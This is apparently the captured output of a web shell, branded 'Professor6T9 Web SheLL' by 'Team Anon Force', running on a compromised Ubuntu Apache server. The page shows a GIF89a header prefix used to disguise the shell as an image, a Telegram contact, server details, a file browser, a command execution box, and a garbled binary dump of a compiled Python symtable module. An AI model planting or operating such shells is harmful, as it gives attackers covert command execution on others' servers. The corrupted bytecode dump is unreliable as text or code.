GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
opt
/
ispmanager
/
python3.10
/
lib
/
python3.10
/
__pycache__
[ HOME ]
Exec
Submit
symtable.cpython-310.pyc
o �᭲��� @ sX d Z ddlZddlmZmZmZmZmZmZmZm Z m Z mZmZm Z mZmZmZ ddlZg d�Zdd� ZG dd� d�Ze� ZG d d � d �ZG dd� de�ZG d d� de�ZG dd� d�Zedkr�ddlZddlZeejd ��Ze� � Z!W d � n1 s~w Y ee!ej"�#ejd �d d�Z$e$�%� D ]Z&e$�'e&�Z(e)e(e(�*� e(�+� � q�dS dS )z2Interface to the compiler's internal symbol tables� N)�USE� DEF_GLOBAL�DEF_NONLOCAL� DEF_LOCAL� DEF_PARAM� DEF_IMPORT� DEF_BOUND� DEF_ANNOT� SCOPE_OFF� SCOPE_MASK�FREE�LOCAL�GLOBAL_IMPLICIT�GLOBAL_EXPLICIT�CELL)�symtable�SymbolTable�Class�Function�Symbolc C s t �| ||�}t||�S )z� Return the toplevel *SymbolTable* for the source code. *filename* is the name of the file with the code and *compile_type* is the *compile()* mode argument. )� _symtabler �_newSymbolTable)�code�filenameZcompile_type�top� r �5/opt/ispmanager/python3.10/lib/python3.10/symtable.pyr s r c @ s$ e Zd Zdd� Zdd� Zdd� ZdS )�SymbolTableFactoryc C s t �� | _d S �N)�weakrefZWeakValueDictionary�_SymbolTableFactory__memo��selfr r r �__init__ s zSymbolTableFactory.__init__c C s6 |j tjkrt||�S |j tjkrt||�S t||�S r )�typer � TYPE_FUNCTIONr � TYPE_CLASSr r )r"